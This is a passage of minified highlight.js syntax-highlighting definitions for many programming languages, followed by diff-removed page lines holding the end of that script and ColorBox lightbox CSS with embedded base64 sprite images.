__halt_compiler",c:[a.CLCM,a.HCM,{cN:"comment",b:"/\\*",e:"\\*/",c:[{cN:"phpdoc",b:"\\s@[A-Za-z]+"}]},{cN:"comment",eB:true,b:"__halt_compiler.+?;",eW:true},{cN:"string",b:"<<<['\"]?\\w+['\"]?$",e:"^\\w+;",c:[a.BE]},{cN:"preprocessor",b:"<\\?php",r:10},{cN:"preprocessor",b:"\\?>"},e,{cN:"function",bWK:true,e:"{",k:"function",i:"\\$|\\[|%",c:[d,{cN:"params",b:"\\(",e:"\\)",c:["self",e,a.CBLCLM].concat(b).concat(c)}]},{cN:"class",bWK:true,e:"{",k:"class",i:"[:\\(\\$]",c:[{bWK:true,eW:true,k:"extends",c:[d]},d]},{b:"=>"}].concat(b).concat(c)}}(hljs);hljs.LANGUAGES.python=function(a){var f={cN:"prompt",b:"^(>>>|\\.\\.\\.) "};var c=[{cN:"string",b:"(u|b)?r?'''",e:"'''",c:[f],r:10},{cN:"string",b:'(u|b)?r?"""',e:'"""',c:[f],r:10},{cN:"string",b:"(u|r|ur)'",e:"'",c:[a.BE],r:10},{cN:"string",b:'(u|r|ur)"',e:'"',c:[a.BE],r:10},{cN:"string",b:"(b|br)'",e:"'",c:[a.BE]},{cN:"string",b:'(b|br)"',e:'"',c:[a.BE]}].concat([a.ASM,a.QSM]);var e={cN:"title",b:a.UIR};var d={cN:"params",b:"\\(",e:"\\)",c:["self",a.CNM,f].concat(c)};var b={bWK:true,e:":",i:"[${=;\\n]",c:[e,d],r:10};return{k:{keyword:"and elif is global as in if from raise for except finally print import pass return exec else break not with class assert yield try while continue del or def lambda nonlocal|10",built_in:"None True False Ellipsis NotImplemented"},i:"(</|->|\\?)",c:c.concat([f,a.HCM,a.inherit(b,{cN:"function",k:"def"}),a.inherit(b,{cN:"class",k:"class"}),a.CNM,{cN:"decorator",b:"@",e:"$"},{b:"\\b(print|exec)\\("}])}}(hljs);hljs.LANGUAGES.sql=function(a){return{cI:true,c:[{cN:"operator",b:"(begin|start|commit|rollback|savepoint|lock|alter|create|drop|rename|call|delete|do|handler|insert|load|replace|select|truncate|update|set|show|pragma|grant)\\b(?!:)",e:";",eW:true,k:{keyword:"all partial global month current_timestamp using go revoke smallint indicator end-exec disconnect zone with character assertion to add current_user usage input local alter match collate real then rollback get read timestamp session_user not integer bit unique day minute desc insert execute like ilike|2 level decimal drop continue isolation found where constraints domain right national some module transaction relative second connect escape close system_user for deferred section cast current sqlstate allocate intersect deallocate numeric public preserve full goto initially asc no key output collation group by union session both last language constraint column of space foreign deferrable prior connection unknown action commit view or first into float year primary cascaded except restrict set references names table outer open select size are rows from prepare distinct leading create only next inner authorization schema corresponding option declare precision immediate else timezone_minute external varying translation true case exception join hour default double scroll value cursor descriptor values dec fetch procedure delete and false int is describe char as at in varchar null trailing any absolute current_time end grant privileges when cross check write current_date pad begin temporary exec time update catalog user sql date on identity timezone_hour natural whenever interval work order cascade diagnostics nchar having left call do handler load replace truncate start lock show pragma exists number",aggregate:"count sum min max avg"},c:[{cN:"string",b:"'",e:"'",c:[a.BE,{b:"''"}],r:0},{cN:"string",b:'"',e:'"',c:[a.BE,{b:'""'}],r:0},{cN:"string",b:"`",e:"`",c:[a.BE]},a.CNM]},a.CBLCLM,{cN:"comment",b:"--",e:"$"}]}}(hljs);hljs.LANGUAGES.vala=function(a){return{k:{keyword:"char uchar unichar int uint long ulong short ushort int8 int16 int32 int64 uint8 uint16 uint32 uint64 float double bool struct enum string void weak unowned owned async signal static abstract interface override while do for foreach else switch case break default return try catch public private protected internal using new this get set const stdout stdin stderr var",built_in:"DBus GLib CCode Gee Object",literal:"false true null"},c:[{cN:"class",bWK:true,e:"{",k:"class interface delegate namespace",c:[{bWK:true,k:"extends implements"},{cN:"title",b:a.UIR}]},a.CLCM,a.CBLCLM,{cN:"string",b:'"""',e:'"""',r:5},a.ASM,a.QSM,a.CNM,{cN:"preprocessor",b:"^#",e:"$",r:2},{cN:"constant",b:" [A-Z_]+ ",r:0}]}}(hljs);hljs.LANGUAGES.perl=function(e){var a="getpwent getservent quotemeta msgrcv scalar kill dbmclose undef lc ma syswrite tr send umask sysopen shmwrite vec qx utime local oct semctl localtime readpipe do return format read sprintf dbmopen pop getpgrp not getpwnam rewinddir qqfileno qw endprotoent wait sethostent bless s|0 opendir continue each sleep endgrent shutdown dump chomp connect getsockname die socketpair close flock exists index shmgetsub for endpwent redo lstat msgctl setpgrp abs exit select print ref gethostbyaddr unshift fcntl syscall goto getnetbyaddr join gmtime symlink semget splice x|0 getpeername recv log setsockopt cos last reverse gethostbyname getgrnam study formline endhostent times chop length gethostent getnetent pack getprotoent getservbyname rand mkdir pos chmod y|0 substr endnetent printf next open msgsnd readdir use unlink getsockopt getpriority rindex wantarray hex system getservbyport endservent int chr untie rmdir prototype tell listen fork shmread ucfirst setprotoent else sysseek link getgrgid shmctl waitpid unpack getnetbyname reset chdir grep split require caller lcfirst until warn while values shift telldir getpwuid my getprotobynumber delete and sort uc defined srand accept package seekdir getprotobyname semop our rename seek if q|0 chroot sysread setpwent no crypt getc chown sqrt write setnetent setpriority foreach tie sin msgget map stat getlogin unless elsif truncate exec keys glob tied closedirioctl socket readlink eval xor readline binmode setservent eof ord bind alarm pipe atan2 getgrent exp time push setgrent gt lt or ne m|0 break given say state when";var d={cN:"subst",b:"[$@]\\{",e:"\\}",k:a,r:10};var b={cN:"variable",b:"\\$\\d"};var i={cN:"variable",b:"[\\$\\%\\@\\*](\\^\\w\\b|#\\w+(\\:\\:\\w+)*|[^\\s\\w{]|{\\w+}|\\w+(\\:\\:\\w*)*)"};var f=[e.BE,d,b,i];var h={b:"->",c:[{b:e.IR},{b:"{",e:"}"}]};var g={cN:"comment",b:"^(__END__|__DATA__)",e:"\\n$",r:5};var c=[b,i,e.HCM,g,{cN:"comment",b:"^\\=\\w",e:"\\=cut",eW:true},h,{cN:"string",b:"q[qwxr]?\\s*\\(",e:"\\)",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\[",e:"\\]",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\{",e:"\\}",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\|",e:"\\|",c:f,r:5},{cN:"string",b:"q[qwxr]?\\s*\\<",e:"\\>",c:f,r:5},{cN:"string",b:"qw\\s+q",e:"q",c:f,r:5},{cN:"string",b:"'",e:"'",c:[e.BE],r:0},{cN:"string",b:'"',e:'"',c:f,r:0},{cN:"string",b:"`",e:"`",c:[e.BE]},{cN:"string",b:"{\\w+}",r:0},{cN:"string",b:"-?\\w+\\s*\\=\\>",r:0},{cN:"number",b:"(\\b0[0-7_]+)|(\\b0x[0-9a-fA-F_]+)|(\\b[1-9][0-9_]*(\\.[0-9_]+)?)|[0_]\\b",r:0},{b:"("+e.RSR+"|\\b(split|return|print|reverse|grep)\\b)\\s*",k:"split return print reverse grep",r:0,c:[e.HCM,g,{cN:"regexp",b:"(s|tr|y)/(\\\\.|[^/])*/(\\\\.|[^/])*/[a-z]*",r:10},{cN:"regexp",b:"(m|qr)?/",e:"/[a-z]*",c:[e.BE],r:0}]},{cN:"sub",bWK:true,e:"(\\s*\\(.*?\\))?[;{]",k:"sub",r:5},{cN:"operator",b:"-\\w\\b",r:0}];d.c=c;h.c[1].c=c;return{k:a,c:c}}(hljs);hljs.LANGUAGES.scala=function(a){var c={cN:"annotation",b:"@[A-Za-z]+"};var b={cN:"string",b:'u?r?"""',e:'"""',r:10};return{k:"type yield lazy override def with val var false true sealed abstract private trait object null if for while throw finally protected extends import final return else break new catch super class case package default try this match continue throws",c:[{cN:"javadoc",b:"/\\*\\*",e:"\\*/",c:[{cN:"javadoctag",b:"@[A-Za-z]+"}],r:10},a.CLCM,a.CBLCLM,a.ASM,a.QSM,b,{cN:"class",b:"((case )?class |object |trait )",e:"({|$)",i:":",k:"case class trait object",c:[{bWK:true,k:"extends with",r:10},{cN:"title",b:a.UIR},{cN:"params",b:"\\(",e:"\\)",c:[a.ASM,a.QSM,b,c]}]},a.CNM,c]}}(hljs);hljs.LANGUAGES.cmake=function(a){return{cI:true,k:"add_custom_command add_custom_target add_definitions add_dependencies add_executable add_library add_subdirectory add_test aux_source_directory break build_command cmake_minimum_required cmake_policy configure_file create_test_sourcelist define_property else elseif enable_language enable_testing endforeach endfunction endif endmacro endwhile execute_process export find_file find_library find_package find_path find_program fltk_wrap_ui foreach function get_cmake_property get_directory_property get_filename_component get_property get_source_file_property get_target_property get_test_property if include include_directories include_external_msproject include_regular_expression install link_directories load_cache load_command macro mark_as_advanced message option output_required_files project qt_wrap_cpp qt_wrap_ui remove_definitions return separate_arguments set set_directory_properties set_property set_source_files_properties set_target_properties set_tests_properties site_name source_group string target_link_libraries try_compile try_run unset variable_watch while build_name exec_program export_library_dependencies install_files install_programs install_targets link_libraries make_directory remove subdir_depends subdirs use_mangled_mesa utility_source variable_requires write_file",c:[{cN:"envvar",b:"\\${",e:"}"},a.HCM,a.QSM,a.NM]}}(hljs);hljs.LANGUAGES.objectivec=function(a){var b={keyword:"int float while private char catch export sizeof typedef const struct for union unsigned long volatile static protected bool mutable if public do return goto void enum else break extern class asm case short default double throw register explicit signed typename try this switch continue wchar_t inline readonly assign property protocol self synchronized end synthesize id optional required implementation nonatomic interface super unichar finally dynamic IBOutlet IBAction selector strong weak readonly",literal:"false true FALSE TRUE nil YES NO NULL",built_in:"NSString NSDictionary CGRect CGPoint UIButton UILabel UITextView UIWebView MKMapView UISegmentedControl NSObject UITableViewDelegate UITableViewDataSource NSThread UIActivityIndicator UITabbar UIToolBar UIBarButtonItem UIImageView NSAutoreleasePool UITableView BOOL NSInteger CGFloat NSException NSLog NSMutableString NSMutableArray NSMutableDictionary NSURL NSIndexPath CGSize UITableViewCell UIView UIViewController UINavigationBar UINavigationController UITabBarController UIPopoverController UIPopoverControllerDelegate UIImage NSNumber UISearchBar NSFetchedResultsController NSFetchedResultsChangeType UIScrollView UIScrollViewDelegate UIEdgeInsets UIColor UIFont UIApplication NSNotFound NSNotificationCenter NSNotification UILocalNotification NSBundle NSFileManager NSTimeInterval NSDate NSCalendar NSUserDefaults UIWindow NSRange NSArray NSError NSURLRequest NSURLConnection class UIInterfaceOrientation MPMoviePlayerController dispatch_once_t dispatch_queue_t dispatch_sync dispatch_async dispatch_once"};return{k:b,i:"</",c:[a.CLCM,a.CBLCLM,a.CNM,a.QSM,{cN:"string",b:"'",e:"[^\\\\]'",i:"[^\\\\][^']"},{cN:"preprocessor",b:"#import",e:"$",c:[{cN:"title",b:'"',e:'"'},{cN:"title",b:"<",e:">"}]},{cN:"preprocessor",b:"#",e:"$"},{cN:"class",bWK:true,e:"({|$)",k:"interface class protocol implementation",c:[{cN:"id",b:a.UIR}]},{cN:"variable",b:"\\."+a.UIR}]}}(hljs);hljs.LANGUAGES.coffeescript=function(c){var b={keyword:"in if for while finally new do return else break catch instanceof throw try this switch continue typeof delete debugger super then unless until loop of by when and or is isnt not",literal:"true false null undefined yes no on off ",reserved:"case default function var void with const let enum export import native __hasProp __extends __slice __bind __indexOf"};var a="[A-Za-z$_][0-9A-Za-z$_]*";var e={cN:"title",b:a};var d={cN:"subst",b:"#\\{",e:"}",k:b,c:[c.BNM,c.CNM]};return{k:b,c:[c.BNM,c.CNM,c.ASM,{cN:"string",b:'"""',e:'"""',c:[c.BE,d]},{cN:"string",b:'"',e:'"',c:[c.BE,d],r:0},{cN:"comment",b:"###",e:"###"},c.HCM,{cN:"regexp",b:"///",e:"///",c:[c.HCM]},{cN:"regexp",b:"//[gim]*"},{cN:"regexp",b:"/\\S(\\\\.|[^\\n])*/[gim]*"},{b:"`",e:"`",eB:true,eE:true,sL:"javascript"},{cN:"function",b:a+"\\s*=\\s*(\\(.+\\))?\\s*[-=]>",rB:true,c:[e,{cN:"params",b:"\\(",e:"\\)"}]},{cN:"class",bWK:true,k:"class",e:"$",i:":",c:[{bWK:true,k:"extends",eW:true,i:":",c:[e]},e]},{cN:"property",b:"@"+a}]}}(hljs);hljs.LANGUAGES.r=function(a){var b="([a-zA-Z]|\\.[a-zA-Z.])[a-zA-Z0-9._]*";return{c:[a.HCM,{b:b,l:b,k:{keyword:"function if in break next repeat else for return switch while try tryCatch|10 stop warning require library attach detach source setMethod setGeneric setGroupGeneric setClass ...|10",literal:"NULL NA TRUE FALSE T F Inf NaN NA_integer_|10 NA_real_|10 NA_character_|10 NA_complex_|10"},r:0},{cN:"number",b:"0[xX][0-9a-fA-F]+[Li]?\\b",r:0},{cN:"number",b:"\\d+(?:[eE][+\\-]?\\d*)?L\\b",r:0},{cN:"number",b:"\\d+\\.(?!\\d)(?:i\\b)?",r:0},{cN:"number",b:"\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d*)?i?\\b",r:0},{cN:"number",b:"\\.\\d+(?:[eE][+\\-]?\\d*)?i?\\b",r:0},{b:"`",e:"`",r:0},{cN:"string",b:'"',e:'"',c:[a.BE],r:0},{cN:"string",b:"'",e:"'",c:[a.BE],r:0}]}}(hljs);hljs.LANGUAGES.json=function(a){var e={literal:"true false null"};var d=[a.QSM,a.CNM];var c={cN:"value",e:",",eW:true,eE:true,c:d,k:e};var b={b:"{",e:"}",c:[{cN:"attribute",b:'\\s*"',e:'"\\s*:\\s*',eB:true,eE:true,c:[a.BE],i:"\\n",starts:c}],i:"\\S"};var f={b:"\\[",e:"\\]",c:[a.inherit(c,{cN:null})],i:"\\S"};d.splice(d.length,0,b,f);return{c:d,k:e,i:"\\S"}}(hljs);hljs.LANGUAGES.django=function(c){function e(h,g){return(g==undefined||(!h.cN&&g.cN=="tag")||h.cN=="value")}function f(l,k){var g={};for(var j in l){if(j!="contains"){g[j]=l[j]}var m=[];for(var h=0;l.c&&h<l.c.length;h++){m.push(f(l.c[h],l))}if(e(l,k)){m=b.concat(m)}if(m.length){g.c=m}}return g}var d={cN:"filter",b:"\\|[A-Za-z]+\\:?",eE:true,k:"truncatewords removetags linebreaksbr yesno get_digit timesince random striptags filesizeformat escape linebreaks length_is ljust rjust cut urlize fix_ampersands title floatformat capfirst pprint divisibleby add make_list unordered_list urlencode timeuntil urlizetrunc wordcount stringformat linenumbers slice date dictsort dictsortreversed default_if_none pluralize lower join center default truncatewords_html upper length phone2numeric wordwrap time addslashes slugify first escapejs force_escape iriencode last safe safeseq truncatechars localize unlocalize localtime utc timezone",c:[{cN:"argument",b:'"',e:'"'}]};var b=[{cN:"template_comment",b:"{%\\s*comment\\s*%}",e:"{%\\s*endcomment\\s*%}"},{cN:"template_comment",b:"{#",e:"#}"},{cN:"template_tag",b:"{%",e:"%}",k:"comment endcomment load templatetag ifchanged endifchanged if endif firstof for endfor in ifnotequal endifnotequal widthratio extends include spaceless endspaceless regroup by as ifequal endifequal ssi now with cycle url filter endfilter debug block endblock else autoescape endautoescape csrf_token empty elif endwith static trans blocktrans endblocktrans get_static_prefix get_media_prefix plural get_current_language language get_available_languages get_current_language_bidi get_language_info get_language_info_list localize endlocalize localtime endlocaltime timezone endtimezone get_current_timezone",c:[d]},{cN:"variable",b:"{{",e:"}}",c:[d]}];var a=f(c.LANGUAGES.xml);a.cI=true;return a}(hljs);hljs.LANGUAGES.cpp=function(a){var b={keyword:"false int float while private char catch export virtual operator sizeof dynamic_cast|10 typedef const_cast|10 const struct for static_cast|10 union namespace unsigned long throw volatile static protected bool template mutable if public friend do return goto auto void enum else break new extern using true class asm case typeid short reinterpret_cast|10 default double register explicit signed typename try this switch continue wchar_t inline delete alignof char16_t char32_t constexpr decltype noexcept nullptr static_assert thread_local restrict _Bool complex",built_in:"std string cin cout cerr clog stringstream istringstream ostringstream auto_ptr deque list queue stack vector map set bitset multiset multimap unordered_set unordered_map unordered_multiset unordered_multimap array shared_ptr"};return{k:b,i:"</",c:[a.CLCM,a.CBLCLM,a.QSM,{cN:"string",b:"'\\\\?.",e:"'",i:"."},{cN:"number",b:"\\b(\\d+(\\.\\d*)?|\\.\\d+)(u|U|l|L|ul|UL|f|F)"},a.CNM,{cN:"preprocessor",b:"#",e:"$"},{cN:"stl_container",b:"\\b(deque|list|queue|stack|vector|map|set|bitset|multiset|multimap|unordered_map|unordered_set|unordered_multiset|unordered_multimap|array)\\s*<",e:">",k:b,r:10,c:["self"]}]}}(hljs);hljs.LANGUAGES.matlab=function(a){var b=[a.CNM,{cN:"string",b:"'",e:"'",c:[a.BE,{b:"''"}],r:0}];return{k:{keyword:"break case catch classdef continue else elseif end enumerated events for function global if methods otherwise parfor persistent properties return spmd switch try while",built_in:"sin sind sinh asin asind asinh cos cosd cosh acos acosd acosh tan tand tanh atan atand atan2 atanh sec secd sech asec asecd asech csc cscd csch acsc acscd acsch cot cotd coth acot acotd acoth hypot exp expm1 log log1p log10 log2 pow2 realpow reallog realsqrt sqrt nthroot nextpow2 abs angle complex conj imag real unwrap isreal cplxpair fix floor ceil round mod rem sign airy besselj bessely besselh besseli besselk beta betainc betaln ellipj ellipke erf erfc erfcx erfinv expint gamma gammainc gammaln psi legendre cross dot factor isprime primes gcd lcm rat rats perms nchoosek factorial cart2sph cart2pol pol2cart sph2cart hsv2rgb rgb2hsv zeros ones eye repmat rand randn linspace logspace freqspace meshgrid accumarray size length ndims numel disp isempty isequal isequalwithequalnans cat reshape diag blkdiag tril triu fliplr flipud flipdim rot90 find sub2ind ind2sub bsxfun ndgrid permute ipermute shiftdim circshift squeeze isscalar isvector ans eps realmax realmin pi i inf nan isnan isinf isfinite j why compan gallery hadamard hankel hilb invhilb magic pascal rosser toeplitz vander wilkinson"},i:'(//|"|#|/\\*|\\s+/\\w+)',c:[{cN:"function",bWK:true,e:"$",k:"function",c:[{cN:"title",b:a.UIR},{cN:"params",b:"\\(",e:"\\)"},{cN:"params",b:"\\[",e:"\\]"}]},{cN:"transposed_variable",b:"[a-zA-Z_][a-zA-Z_0-9]*('+[\\.']*|[\\.']+)",e:""},{cN:"matrix",b:"\\[",e:"\\]'*[\\.']*",c:b},{cN:"cell",b:"\\{",e:"\\}'*[\\.']*",c:b},{cN:"comment",b:"\\%",e:"$"}].concat(b)}}(hljs);
-</script>
-<!-- END extlib/js/highlight-7.3.pack.min.js -->
-<!-- START extlib/css/colorbox.css -->
-<style id="style:extlib/css/colorbox.css">/*
-    ColorBox Core Style:
-    The following CSS is consistent between example themes and should not be altered.
-*/
-#colorbox, #cboxOverlay, #cboxWrapper{position:absolute; top:0; left:0; z-index:9999; overflow:hidden;}
-#cboxOverlay{position:fixed; width:100%; height:100%;}
-#cboxMiddleLeft, #cboxBottomLeft{clear:left;}
-#cboxContent{position:relative;}
-#cboxLoadedContent{overflow:auto;}
-#cboxTitle{margin:0;}
-#cboxLoadingOverlay, #cboxLoadingGraphic{position:absolute; top:0; left:0; width:100%; height:100%;}
-#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{cursor:pointer;}
-.cboxPhoto{float:left; margin:auto; border:0; display:block; max-width:none;}
-.cboxIframe{width:100%; height:100%; display:block; border:0;}
-#colorbox, #cboxContent, #cboxLoadedContent{box-sizing:content-box;}
-
-/*
-    User Style:
-    Change the following styles to modify the appearance of ColorBox.  They are
-    ordered & tabbed in a way that represents the nesting of the generated HTML.
-*/
-#cboxOverlay{background:#000;}
-
-#colorbox{}
-
-        #cboxTitle{position:absolute; bottom:-25px; left:0; text-align:center; width:100%; font-weight:bold; color:#7C7C7C;}
-        #cboxCurrent{position:absolute; bottom:-25px; left:58px; font-weight:bold; color:#7C7C7C;}
-
-        #cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{position:absolute; bottom:-29px; background-repeat: no-repeat; background-position: 0px 0px; width:23px; height:23px; text-indent:-9999px;}
-        #cboxPrevious{left:0px; background-position: -51px -25px;}
-        #cboxPrevious:hover{background-position:-51px 0px;}
-        #cboxNext{left:27px; background-position:-75px -25px;}
-        #cboxNext:hover{background-position:-75px 0px;}
-        #cboxClose{right:0; background-position:-100px -25px;}
-        #cboxClose:hover{background-position:-100px 0px;}
-
-        .cboxSlideshow_on #cboxSlideshow{background-position:-125px 0px; right:27px;}
-        .cboxSlideshow_on #cboxSlideshow:hover{background-position:-150px 0px;}
-        .cboxSlideshow_off #cboxSlideshow{background-position:-150px -25px; right:27px;}
-        .cboxSlideshow_off #cboxSlideshow:hover{background-position:-125px 0px;}
-
-/* begin inline customizing */
-
-    #cboxBottomCenter{height:43px; background-repeat: repeat-x; background-position: bottom left;}
-    #cboxTopCenter{height:14px; background-repeat: repeat-x; background-position: top left;}
-
-    #cboxBottomCenter, #cboxTopCenter {background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAABLCAMAAACGCB2xAAAAM1BMVEVSUlJHR0dPT09BQUFLS0tQUFA6OjpgYGCKioozMzPS0tJaWlpRUVHy8vKJiYn////m5eV3dK93AAAAK0lEQVR4XqXBhQ2AQBAAsJ48bvtPywyE1GLGYUgtlPuT0+b5abealNDScL0YiAPSV/RH9wAAAABJRU5ErkJggg==);}
-
-    #cboxTopLeft, #cboxTopRight, #cboxBottomLeft, #cboxBottomRight, #cboxMiddleLeft,
-
-    #cboxMiddleRight, #cboxContent,#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow {
-        background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAOEAAABLCAMAAACx6hDAAAABj1BMVEVPT0/e3t7b29vS0tK7urq5uLjq6uqZmZmSkpJaWlrU1NTj4+PFxcWvr6+goKBbW1u3t7c9PT27u7vCwsKsrKxiYWGqqqq5ublbWlpeXV2Xl5fExMSbmpq6ubmNjY18fHzy8vIrKystLS0sLCxNTU0uLi4wMDDNzc05OTns6+vl5eUvLy/q6ekqKipMTExDQ0M4ODgyMjI2NjbZ2dk6OjrY2NjMzMxLS0vAwMBCQkLo5+dHR0cxMTFKSkpBQUHv7u43NzdISEhFRUVRUVHx8fE7Ozs8PDwzMzNJSUnp6elGRkZQUFDr6upeXl7t7e1gYGCoqKjv7+81NTWKiorn5uZERESCgoJdXV3p6OhOTk51dXVAQEA+Pj6np6fu7e2+vr5cXFxSUlKJiYnOzs7s7OxTU1P29vbw8PB2dnZfX1/m5eV4eHifn59qamqmpqbQ0NCOjo7Kysqzs7P4+PiDg4Otra3z8/M/Pz80NDSrq6u/v7/Pz890dHRpaWmBgYH5+fn08/NoaGjPzs7///+ioqIRuwm9AAAGHUlEQVR4XsTXZY/jPBAA4PwUQxjKzMzLjMfMzPfiD7+xm23ibjZVu5u7+VBL7ljyI3scW9pZOv59+gdjZ+NOeyzlyzXtv9B408/Uynlp3L4r7bzYWC5E4a4xvAQYGkEA2/DG2GL6biBmHbGoz9pVhTBkuRCEhx0TzVNKKNspBczXdHtLnTRa9yC78MdhAND+6xaLh3+7bf1mhO3guEpooJfbaH56h2i7gOx5oCmlckBkwFzqGIi+9LdocllofMSUUnzrndui6wo5bnxVzJyC8BztO06A0HFeM4IIxLgBRAZsYAeI/vSf6DxASAkhFIS8vbaQ6aSw4ExBWNoyDyjFAUKM6Q9zy1ddEwBSSnStY3c0ncCo78j2px+YW6VLQqIoCgEhb68p5L4jWY6xyIsR4yHLgASiJ4S5JohCaICQQn8756suI5vC0KlkNKRlFBiEU9mJkN7KdYaRCpkvVh00y8HRbA6qMZkRZ8L7aJMolmUpiMe6u215ENafOEPe6Qlbk0K22tvoqTCGwob1lpyn0zN0PzIhB8aqzdFevFgLjGJ8b9TMA3EmrJuPAaiqqvVgbe3g9rFp8834z+2DtbUHvF8h+151QfUliKVWWKgWSUBFekI3/TGqzwstV2jdgFCulj+EjfhSbLlEELIDv82A0wmzXffVYJMqOBTcLkQhrLo8om5VkhAg1BnQE16kt81HpWiEfAmb/4cPeV5rDWKu8BAVGpRJ2IQ5ERemQsy73X6+GXdnRK1bSfb7/WSlqwHQJ/TSCyD3hIorVG5CKFdHr8KF907j5ao8FRppBxMFgDDfpCgkU/i0n2DHq0UbPXGFz5AtHEy+9KwRkRCWMP4tXKhlTlpVWZqtIVBAEryGSRYBa6jyP9T5NfTSYQ0j2qVH+XLx3gJh4nRvEAPh3Ys6nNUbq8OCWIccLtahlpmdNLom1qGb3k5HVofSUX5UWyDMpXpxVoggdM9SIPrO0olwllZUAL4XzlId6NOwFF08S3l6hGcpO2iqrZNFwu1esRljQ0K+h3XEg/frm8L3MEEU6O4+gR9Y9IT/e8jTyWYE30NB+Gk5Ib/T6ErInUbzXVKMdAMTCF1Dmk4gcCM9d6dh6RELtQXCz11BGHovpYH3UgorZ8NqUhh1jGx/evC9FOQg5O1vFa72thj73xZ47m2xv9LbInqh+D4MffABUeLAp5wYwfswEiHEcKU3fnalN37kwl/s2M9LAkEUB/C0ml12VgmKLh2+cwtBOkWRUdIvIpJayYNdgkIIukUDdYz8x2tnt96OjQMS8hbzexFhDn6QN2/eIyHTnoZByJD/KJwL58L5TdM/FY5uIZ3dQvx0C2l3C+HuFsNKmuF7/tlm6vixdnR8vfm744tQV/OOX9UJEen4SBpDpKm85J9Mr7Ya4BACK4ZgAYGUaICAIdLxmroro7DVFQHGCFEX1ss7BRpi0wBTYrN4PBDdVumE5reOFSKsFqcnqZERVQaElh3r+A0dn5pwQ3mzOiIcqBgmjo1wZoiLE/A3LEBOLUzAMInVYMrCtUVv1m1hWyTIEgZfSYTZCIt6+iVEFqqurPoopiJHhEhUe7rCpSdvlkloLvwQViKziYpAoeoiogNIQoTysVUSYV9FGl4hUXoWkYAOIXREcl5hQwJeIaW4EQ4A0D3qEAKyMfP/YW+261Aw16H/Lu3MyF36936o6Qpy9ENW4eRvmv6kbxpmIcO7lEHIMFuwCf3zYaSaE8+H/EL2GZ9BWOY9zWc7d+wSMQzFcbzDCTqVCnJ3ok4HdrpAKZRSWnInicUOQiVISYeem25O6Xz+4/YJWaokg8Px4P3+gw/p+L79p/AkQyEkIQlJSEISkpCEJCQhCUmofcJWIhXa+1KfcJlIBsIDSmEzCatLt/CW96pGLNzu2LlbeBcbe+eNURhs6r2+cQGvuczhVh+tsMsK1qdX769DuLqYLQyHdc+lht4CqfDnMy0LZmScjI+/N7Y8llpNT4hYGABRVSYSIp1PCBmZygJRCn1pV87UHsKurnnAK3Tnebu6zCDOgydEKZwnlts/+srOBpY4hdbYOBtZACIWghHm7JyRCu3efEP6T4Vv0sK5wmQ8JLkAAAAASUVORK5CYII=);
-    }
-
-    #cboxTopLeft{width:14px; height:14px; background-repeat: no-repeat; background-position: 0 0;}
-    #cboxTopRight{width:14px; height:14px; background-repeat: no-repeat; background-position: -36px 0;}
-    #cboxBottomLeft{width:14px; height:43px; background-repeat: no-repeat; background-position: 0 -32px;}
-    #cboxBottomRight{width:14px; height:43px;  background-repeat: no-repeat; background-position: -36px -32px;}
-    #cboxMiddleLeft{width:14px; background-repeat: repeat-y; background-position: -175px 0;}
-    #cboxMiddleRight{width:14px; background-repeat: repeat-y; background-position: -211px 0;}
-    #cboxContent{background:#fff; overflow:visible;}
-
-
-
-        .cboxIframe{background:#fff;}
-        #cboxError{padding:50px; border:1px solid #ccc;}
-        #cboxLoadedContent{margin-bottom:5px;}
-        #cboxLoadingOverlay{background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoBAMAAAB+0KVeAAAAElBMVEX///////////8AAAD///////9H1zSfAAAABXRSTlPvgBAAz5JLnNUAAAA+SURBVHhe7dMhAQAgEEPRIfAYEkCCi0ACEOtfBc8WAHFfPr0hGp/KwKS00BUPquIGTZ9gYqIdrZ23PYK9zAX6sAYavSqAMgAAAABJRU5ErkJggg==);
-         background-repeat: no-repeat; background-position: center center;}
-        #cboxLoadingGraphic{background: url(data:image/gif;base64,R0lGODlhIAAgAPYAAP////9VAP77+v7j1v7m2v78/P7Quv6qgP6wiv7UwP749v7v6P6viP6ofv6/oP7u5v6fcP6LUv6rgv7s5P728v6nfP7Aov7Irv54Nv57Ov5/QP6bav7n3P739P6mev7Dpv76+P7ayP58PP6cbP7w6v6+nv6keP7Tvv7g0v53NP56OP7HrP7Yxv7czP7z7v7i1P50MP7MtP7SvP7EqP708P6ebv62kv7k2P7r4v6uhv5gEv5fEP5sJP5eDv5zLv67mv7q4P7o3v7y7P7KsP68nP64lv6WYv6zjv63lP6DRv6HTP6KUP6CRP6GSv60kP7ezv6ESP6AQv7f0P7Wwv6ITv66mP5mGv5vKP52Mv5jFv5iFP7PuP6QWv6MVP7CpP6gcv6PWP6TXv6XZP6SXP6OVv5rIv5qIP5oHv5wKv7byv7XxP6aaP7Otv6YZv5yLP7Gqv5kGP6UYP5nHP6idP6jdv7Lsv5uJv6shP5+Pv6yjP5cDAAAAAAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh/hpDcmVhdGVkIHdpdGggYWpheGxvYWQuaW5mbwAh+QQJBQAAACwAAAAAIAAgAAAH/4AAgoOEhYaHiImKi4yNjo+QkZKECzk2NJOCDxchgwU1OjsSmQoQGCIWghQiOz01npALERkYGQ4AFBqtP4ILN0ACjgISGhkpGDIANjw+KABCKNEujxMbGiowowAEHIIT0SgUkBwjGiIzhkIvKDiSJCsxwYYdmI8KFB0FjfqLAgYMEiSUEJeoAJABBAgiGnCgQQUPJlgoIgGuWyICCBhoRNBCEbRoFhEVSODAwocTIBQVwEEgiMJEChSkzNTPRQdEFF46KsABxYtphUisAxLpW7QJgkDMxAFO5yIC0V5gEjrg5kcUQB098ElCEFQURAH4CiLvEQUFg25ECwKLpiCmKBC6ui0kYILcuXjz6t3Ld1IgACH5BAkFAAAALAAAAAAgACAAAAf/gACCg4SFhoeIiYqLjI2Ohw8Tj44XKlhbk4sKEVZZXAWZgwsxLYMdTJ1RCqEAIA1JSjOCFKhaUSCCoI8kRkpMULIKVFZaXaALN0C6jAVHS01RTFMAVVc8XgBCKN